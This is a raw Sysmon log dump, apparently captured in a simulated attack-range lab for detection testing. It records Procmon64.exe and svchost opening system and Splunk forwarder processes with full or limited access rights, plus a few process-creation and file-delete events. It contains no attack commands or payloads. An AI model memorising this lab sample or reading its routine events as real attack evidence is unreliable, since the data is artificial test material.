10:55:45.488{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217486Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.488{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217485Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.488{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217484Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.488{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217483Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.488{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217482Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.488{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217481Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.488{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-12B1-6216-7B04-000000003902}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217480Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.488{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217479Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.488{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12B1-6216-7B04-000000003902}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217478Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.489{4F8D34B0-12B1-6216-7B04-000000003902}3496C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217477Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:45.442{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3ECA259E5E7AC6F6BEFB4BAFC0F87B1,SHA256=0F150A4CBC27B2AA074EB058E0C31B9F1C89619A7EC0A5010A4318F0C832B834,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289672Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.060{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1300-000000003802}616C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289671Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:45.060{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217495Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:46.444{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C24A5D1F6959897ABA617C18004C7A4B,SHA256=CC8C16C46F73473817D7C1E489086E2832CC881E49D0B9C3C07C197935DFFDB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289727Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.948{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289726Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.948{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F133-6215-4600-000000003802}3804C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289725Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.925{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F133-6215-4600-000000003802}3804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289724Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.909{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F133-6215-4500-000000003802}3792C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289723Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.878{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F133-6215-4500-000000003802}3792C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289722Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.878{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F132-6215-3800-000000003802}3484C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289721Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.847{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F132-6215-3800-000000003802}3484C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289720Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.847{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F131-6215-3400-000000003802}3248C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289719Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.725{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F131-6215-3400-000000003802}3248C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289718Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.725{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-3200-000000003802}2628C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289717Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.694{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-3200-000000003802}2628C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289716Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.694{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-3100-000000003802}2568C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289715Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.663{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-3100-000000003802}2568C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289714Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.647{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289713Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.610{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289712Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.610{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2F00-000000003802}2588C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\Administrator\Downloads\Procmon64.exe+affdc|C:\Users\Administrator\Downloads\Procmon64.exe+ae307|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289711Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:46.579{C8EA50B7-11CB-6216-2005-000000003802}23287020C:\Users\Administrator\Downloads\Procmon64.exe{C8EA50B7-F130-6215-2F00-000000003802}2588C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ntdll.dll+6cd1a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Users\Administrator\Downloads\Procmon64.exe+ae1c2|C:\Users\Administrator\Downloads\Procmon64.exe+88dc2|C:\Users\Administrator\Downloads\Procmon64.exe+89039|C:\Users\Administrator\Downloads\Procmon64.exe+cd680|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289710Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 